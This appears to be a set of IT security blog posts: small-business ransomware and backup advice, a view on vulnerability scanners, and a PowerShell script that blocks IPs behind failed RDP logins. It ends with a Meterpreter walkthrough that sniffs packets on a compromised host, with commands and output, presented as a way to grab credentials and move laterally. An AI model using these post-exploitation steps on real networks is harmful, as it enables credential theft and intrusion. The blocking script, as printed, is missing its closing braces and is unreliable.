Small Business Protection Again Ransomware


There are a lot of system that can help you to protect again ransomware and it is up to your budget. Normally the small business doesn't have the resources for a systems that detect any threat through the email, web filtering on the machine, firewall, etc.


Now there a few things that normally can help the small companies to fight again ransomware:


  1. Backup - Yes backup is not expensive, you can have different options, the one that only backup some files for your shared folder and the one that backup the full image server. Depending of your needs and requirement you can chose. In my case I would recommend image backup of your server or workstation. One full backup and incremental backup. Shadow Protect is a good option.
  2. Good antivirus. One I like a lot is Webroot, low resources and fight pretty good again Ransomware. It protect specially when you are on internet.
  3. Run Windows updates. Your system needs to be patched and all your software updated like java.
  4. Common sense. Yes, this is very important, be careful where you go on internet, what file you open if somebody send you one by email. Normally I do not open a file if I did not ask for it, including if the file comes from my mother.

If you make the math, you will spend only in two things: backup solution and antivirus. I would not go through free backup, you need something automatic, unattendant backup. Set Windows updates automatic and pay attention what you do in your computer, read the alert that Windows or the antivirus tell you when there is a risk.


Automated vulnerability scanners provide a lot of false positives reports, this create a lot of work for Security Analyst and some of them hate them. Are Vulnerability scanners broken? 


Not necessary, still the automated vulnerability scanners provide a lot of help to identify weakness of the system or OS and it is cheaper compering to a penetration testing.


Security is an ongoing process, automated scanner help to increase the security bar of any system but at the same time it shouldn't replace any penetration testing. After you keep running the automated tool you bring a penetration tester. The pentester will focus in the most difficult weakness because you found the easy one with vulnerability scanner.


So, Are Vulnerability scanners broken? No, they keep helping to protect the data.


Several times you check the Security logs and noticed some IP addresses ate trying to guess any username and password to the remote desktop or RDP.


This script is for Windows 2008/2008R2 and Windows 7.


Because we want to block and stop those attacks a lot of Security Analyst block the IP address in the Firewall (Windows or Appliance). It is good but there is a  big chance that another IP show up attacking when the analyst is sleeping or doing something else.


This script will read the Windows log looking for the Event id 4625 in the last 5 minutes , then will remove the log information and duplicate IP addresses, at the end will write the ip addresses in the firewall to block them. Now this block will be for the whole IP not the port.


The next time you run the script it will delete all the IP addresses the script wrote in the firewall and begin the process again.


Now if there is not any new IP address to add the scrip will end.


This script is basic. So there is not port involved just IP addresses and if a legitit user put wrong password he/she ip will be block it in the next time you runt he script.


Now to run the script every 5 minutes you will need to create a task in the Windows machines to run every 5 minutes.


If you want to copy the script please copy and past in the Notepad to make sure the code is fine otherwise you will get some errors and will troubleshooting.


If you need custom code please contact me and I will be glad to help you for small fee.


This is the script:







netsh advfirewall firewall del rule name="Block IP Attacker"




### This check the latest 5 minutes wrong username and password. If you want to change the time replace the -5 for any minutes you want.



Get-EventLog -LogName Security -After (Get-Date).AddMinutes(-5) | Where-Object {$_.eventID -eq 4625}| Format-List message | Out-File result.txt



### This find the IP addresses line



get-content result.txt | Select-String -Pattern "Source Network Address:" | out-file result2.txt



###CLEAN THE OUTPUT to eliminate any character and letters from the logs


Get-Content result2.txt | ForEach-Object {$_ -replace "Source Network Address:", ""} | ForEach-Object {$_ -replace "-", ""} | out-file result3.txt


Get-Content result3.txt | ForEach-Object {$_.trim()} | out-file result4.txt


Get-Content result4.txt | where {$_ -ne ""} > result5.txt





get-content result5.txt | sort| Get-Unique | out-file result6.txt


Get-Content result6.txt | where {$_ -ne ""} > iptoblock.txt


get-content iptoblock.txt




###CREATING RULES FIREWALL, IF THERE IS NOT ANY ATTACK THE PROGRAM WILL EXIT and will print No New Incidents, I will sleep waiting for new attacks


if ((Get-item iptoblock.txt).length -eq 0)



    write-host "No New Incidents, I will sleep waiting for new attacks"








$c = get-content iptoblock.txt


foreach ($ip in $c){


    netsh advfirewall firewall add rule name="Block IP Attacker" dir=in interface=any action=block remoteip="$ip"







###This will tell you the scrip finish, you can comment this line


write-host "WORK DONE"





This is not part of the script.






How is possible that a lot of companies worked without a good back up? The risk is high. Very often in the moment where you do not expect it you get a hit and then the only solution you have is restore from backup.


These are some of examples:


1. User is surfing the internet and hit a site that infect his/her machine and the malware is a crypto locker one, terrible, begin to encrypt all the network drives mapped in that computer and some of those malware including encrypt the shadow files. You have two options: restore from backup or pay the ransom.


2. This is very common, users showed up at 7:30 a.m. and the accounting or file server is not working, you go and check and discover the hard drive is failing or the whole OS is corrupted including the data, etc, etc. Specially with hardware failed you need to restore from backup.


In the previous example what happen if you do not have backup, then prepare your resume, very soon you will begin to look for a job, the company will lose money.


Now what happen if you have backup, you are happy, and begin to restore the data or server and discovered the backup is not working right and you cannot restore anything. Nobody never tested the backups.


Now we can say Houston we got a problem!!!.


I saw others companies who lost data between 30 GBytes to 1 TBytes and they restored the data in a couple of hours, very quickly. Good. Why, because they implemented good backup solution according to their needs.


Types of Backups: Image or files.


No tall the backups are the same, depend of many factors, if you have servers that needs to restore complex applications then you need backup that create images of the machine. 


For the file servers is different, you just need to backup the files or data, so in case the files became corrupted, encrypted or deleted you can restore them very easy including in production time.


There are different strategies to protect company data or servers in case of disasters, you know your company and environment, like the people says: Choose wisely.!!!


Meterpreter allow you to run packet sniffer with extension, and something very important is that the sniffer is never saved in the target hard drive. I will explaint hwo to enable packet sniffer with Metasploit with Meterpreter:


Lets consider you are already connect with any exploit and meterpreter enable, then you type the following:


###user sniffer extension


meterpreter > use sniffer


Loading extension sniffer...success.


meterpreter > ?





Sniffer Commands



    Command             Description

    -------             -----------

    sniffer_dump        Retrieve captured packet data to PCAP file

    sniffer_interfaces  Enumerate all sniffable network interfaces

    sniffer_release     Free captured packets on a specific interface instead of downloading them

    sniffer_start       Start packet capture on a specific interface

    sniffer_stats       View statistics of an active capture

    sniffer_stop        Stop packet capture on a specific interface

### We try to see what interface we will to use to sniff the traffic
meterpreter > sniffer_interfaces
1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Realtek PCIe GBE Family Controller' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
###You can see the interface 2 is the network one, we will start using that interface:
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
### Stop the sniffer
meterpreter > sniffer_stop 2
[*] Capture stopped on interface 2
[*] There are 3099 packets (1365925 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
### Download the data
meterpreter > sniffer_dump 2 /root/raul.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 3099 packets (1427905 bytes)
[*] Downloaded 036% (524288/1427905)...
[*] Downloaded 073% (1048576/1427905)...
[*] Downloaded 100% (1427905/1427905)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /root/raul.pcap
The I was able to open the file using wireshark raul.pcap
Where can you use this? You can use it to grab credentials, move horizontal on the network if you are pentesting a network or if you are troubleshooting any computer problem on the network.